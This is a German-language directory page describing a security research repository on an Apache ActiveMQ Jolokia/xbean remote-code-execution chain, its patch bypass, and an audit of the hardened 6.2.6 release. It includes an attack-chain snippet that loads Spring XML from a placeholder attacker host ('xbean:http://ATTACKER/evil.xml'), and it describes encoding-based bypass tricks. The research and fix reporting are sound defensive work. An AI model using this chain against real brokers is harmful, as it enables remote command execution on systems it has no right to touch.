Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
apache-activemq-rce-research — Apache ActiveMQ Classic RCE Forschung: CVE-2026-34197 / CVE-2026-42588 Bypass-Kette + hardened-6.2.6 Prüfungsergebnisse + Crowdfense Vergleich | Kitploit
Tools/GitHubGitHub/dinosn/apache-activemq-rce-research
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & BildungPayload-Entwicklung
GitHubdinosn/apache-activemq-rce-research

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

apache-activemq-rce-research

Apache ActiveMQ Classic RCE Forschung: CVE-2026-34197 / CVE-2026-42588 Bypass-Kette + hardened-6.2.6 Prüfungsergebnisse + Crowdfense Vergleich

Repository anzeigen
84vor 1 MonatNoch nicht geprüft

Apache ActiveMQ Classic – RCE-Forschung

Privates Forschungsarchiv für die Apache ActiveMQ Classic Jolokia → addNetworkConnector → xbean/Spring-XML Remote-Code-Execution-Kette (CVE-2026-34197 und deren Patch-Bypass CVE-2026-42588), plus ein vollständiges automatisches Forschungsaudit der behobenen Version 6.2.6 und ein direkter Vergleich mit Crowdfenses öffentlichem Bypass-Artikel.

Alle Exploitationen wurden gegen lokale Lab-Broker (Docker / selbst gehostet) durchgeführt. Payloads verwenden Platzhalter-Angreifer-Hosts.


Inhaltsverzeichnis

Verz.PhaseInhalt
00-comparison-vs-crowdfense.mdVergleichUnsere Arbeit vs. den Crowdfense-Artikel „ActiveMQ RCE Bypass", quellenverifiziert an Datei:Zeile
01-original-cve-2026-34197/Original-NachvollzugAnalyse + PoC-Skripte + Spring-XML-Payloads (Labor: activemq-classic:5.18.6)
02-reaudit-apr30/Versionsmatrixuid=0 auf 5.18.3 / 5.18.6 / 6.1.4 / 6.1.7; Bewertung + PoC + version-matrix.sh
03-reaudit-42588-42253/Live-BypassComposite-Bypass ohne Klammern (42588) + MessageServlet XSS (42253), live reproduziert
04-audit-6.2.6/Vollständiges AuditAuto-Forschungsaudit der gehärteten 6.2.6: Abschlussbericht + Ergebnisliste

Quelltextbäume und Binärverteilungen des Herstellers, die während der Labore verwendet wurden, sind absichtlich ausgeschlossen (sie stammen vom Upstream, nicht von uns).


Die Schwachstelle in einem Satz

Ein authentifizierter (bei 6.0.0–6.1.1 unauthentifiziert über CVE-2024-32114) Jolokia-Aufrufer ruft BrokerView.addNetworkConnector(uri) mit einer manipulierten Discovery-URI auf, deren innerer vm://…?brokerConfig=xbean:<url> den Broker zwingt, ein angreifergesteuertes Spring-XML zu laden, das eifrig einen ProcessBuilder-Bean vor der Broker-Validierung instanziiert → Betriebssystem-Befehlsausführung.

root@kitploit:~
POST /api/jolokia/  →  BrokerView.addNetworkConnector(String)
  →  static:(vm://evil?brokerConfig=xbean:http://ATTACKER/evil.xml)
  →  VMTransportFactory dynamic broker creation  →  XBeanBrokerFactory
  →  ResourceXmlApplicationContext loads Spring XML  →  ProcessBuilder bean  →  RCE

Ergebnisse

Schlagzeile: Drei Ergebnisse sind live nachgewiesen für Root/XSS; das 6.2.6-Audit fügt eine breitere Menge hinzu, die quellenverifiziert und feindlich bewertet, aber noch nicht live detoniert ist. Keines der 6.2.6-Erweiterungen ist eine neue unauthentifizierte RCE – der Anbieter hat diese Türen geschlossen; das Restrisiko verlagerte sich auf Autorisierung und Ausgabekodierung.

Nachgewiesene Exploitation-Kette

Neue Ergebnisse aus dem 6.2.6-Audit (quellenverifiziert)

Nicht im Fokus – DoS (katalogisiert, nicht Schlagzeile)

MQTT QoS ordinal AIOOBE (QoS.values()[ordinal], protokollübergreifend, keine Konfiguration) · OpenWireFormat.DEFAULT_MAX_FRAME_SIZE = Long.MAX_VALUE · signed-short NegativeArraySizeException in OpenWire-Unmarshal · negative AMQ_SCHEDULED_REPEAT unsterblicher Job.


Vergleich mit dem Crowdfense-Artikel

Crowdfenses Apache ActiveMQ RCE Bypass behandelt die gleiche Kette (sie führen sie unter CVE-2026-34197; wir verfolgen den Bypass als eigenen CVE-2026-42588). Beide Darstellungen stimmen in einer dreischichtigen Verteidigung überein; die einzige Abweichung ist Schicht 2.

Die eine Lücke: Ihr Layer-2-Prozentkodierungs- + UNC/WebDAV-Trick erreicht eine vollständig entfernte Zustellung ohne lokale Schreibprimitive. Der Ausweichfehler, den er ausnutzt (activemq-spring/Utils.java:123-129, ein rohes startsWith("file://") auf dem unkodierten String) ist in unserem genauen Quellcode vorhanden – aber die entfernte Hälfte ist Windows-only (Linux behandelt //host/share als lokalen Pfad), und unser Labor war Linux, daher war es dort nicht ausführbar. Es ist auf 6.2.6 ohnehin tot (das VMTransportFactory Schema-Gate lehnt xbean ab, bevor Utils läuft).

Weiterführend: Ein Windows-gehostetes 5.19.6 (oder ein beliebiges Pre-5.19.7/6.2.6-Build) + SMB/WebDAV-Listener würde es uns ermöglichen, den vollständig entfernten Allow-List-Bypass zu demonstrieren – die einzige Fähigkeit, die der Artikel hat, die unser Engagement nicht gezeigt hat.


Fix (ActiveMQ 6.2.6)

Drei Commits schließen die Kette: c1b44af11 (Composite-URIs ohne Klammern validieren – parseComposite bedingungslos + rekursiv), c2fc7a1d6 (XBeanBrokerFactory standardmäßig über die VMTransportFactory-Schema-Erlaubnisliste blockieren) und be8415f24 (Beispielkonfigurationshärtung: Jolokia auf Loopback, Operationssperrliste mit addNetworkConnector).

Tool herunterladen
IDErgebnisKlasseSchweregradAuthentifizierungNachweis
CVE-2026-34197Jolokia addNetworkConnector → xbean Spring-XML RCERCEKritischNach Authentifizierung (unauthentifiziert 6.0.0–6.1.1)Live – uid=0 auf 5.18.3 / 5.18.6 / 6.1.4 / 6.1.7
CVE-2026-42588Composite-URI-Bypass ohne Klammern der 34197-ListeRCE (Patch-Bypass)KritischNach AuthentifizierungLive – uid=0 auf 34197-gepatchtem 5.19.6 + 6.2.0
CVE-2026-42253MessageServlet Header-Injection → gespeichertes XSSInjection / XSSMittelNach AuthentifizierungLive auf 6.2.0
IDErgebnisKlasseSchweregradAuthentifizierungAnmerkungen
C1static: Lücke in der Sperrliste → SSRF – static fehlt in DENIED_TRANSPORT_SCHEMES; addNetworkConnector("static:(tcp://…)") → ausgehender Broker-TCPSSRFMittelAdmin / JMXSink-Variante hinter derselben 34197/42588-Sperrliste, die der Artikel behandelt
B1Cross-clientId-Löschung-IDOR bei dauerhaften Abonnements – removeSubscription verwendet die drahtgelieferte clientId und ist in AuthorizationBroker nicht abgesichertFehlerhafte Autorisierung / IDORMittelNach Authentifizierung (vor Authentifizierung, wenn Broker-Auth aus)Sauberstes neues Ergebnis
B3LDAP leeres Passwort → anonymer Bind (LDAPLoginModule, keine Leerprüfung)AuthentifizierungsumgehungMittel (bedingt)Vor AuthentifizierungAbhängig davon, dass das Verzeichnis anonyme Bindungen akzeptiert
A1–A7Konsolen Ausgabekodierungs-Injektionsfamilie – angreifergesteuertes MessageId.textView (OpenWire v10+ & AMQP) nicht maskiert über ~7 JSP/REST-Senken + FileSystemBlobStrategy Pfad-TraversalInjektionNiedrig–MittelProduzent → AdministratorStandardmäßig durch CSP auf HTML/Content-Injektion beschränkt
B2Shiro WildcardPermission Doppelpunkt-Injektion Verb-HochstufungPrivilegienerweiterungNiedrig–MittelNach AuthentifizierungShiro nicht standardmäßig
B4Temp-Destination-Autorisierung Fail-Open-Asymmetrie vs. Nicht-Temp-Fail-ClosedFehlerhafte AutorisierungNiedrigNach AuthentifizierungDesignbedingt (AMQ-4721); Härtungshinweis
B5StatisticsBroker replyTo überspringt Schreib-ACL, wenn Plugin vor Autorisierung angeordnet istFehlerhafte AutorisierungNiedrigNach AuthentifizierungAbhängig von der Konfigurationsreihenfolge
B6Cert-Login nicht-kanonischer DN (getSubjectDN().getName()) → Identitätskollision unter Zertifikaten derselben CAAuthentifizierungNiedrigVor Authentifizierung (TLS-validiert)„Jedes selbstsignierte Zertifikat" funktioniert nicht
B7JMSXUserID Spoofing, wenn populateJMSXUserID=false (Standard)SpoofingNiedrigNach Authentifizierung—
F5STOMP ausgehender Header-Name nie maskiert → Frame-Injection an Co-Tenant-AbonnentenInjektionNiedrigProtokollübergreifendSTOMP aktiviert
LayerVerteidigungCrowdfense umgeht es durchWir umgingen es durch
1Schema Sperrliste (34197-Fix)Composite ohne Klammern static:vm://…Gleich – unabhängig gefunden ✅
2xbean {file,classpath} Erlaubnisliste (#1910)Prozentkodiertes file:%2f%2f… → Windows UNC → WebDAV → entfernter HTTP-AbrufLokale Datei xbean:/tmp/evil.xml (erfordert lokalen Schreibzugriff)
3VMTransportFactory Schema-Gate (broker,properties, der 42588/6.2.6-Fix)Als endgültig anerkanntGleiche Schlussfolgerung ✅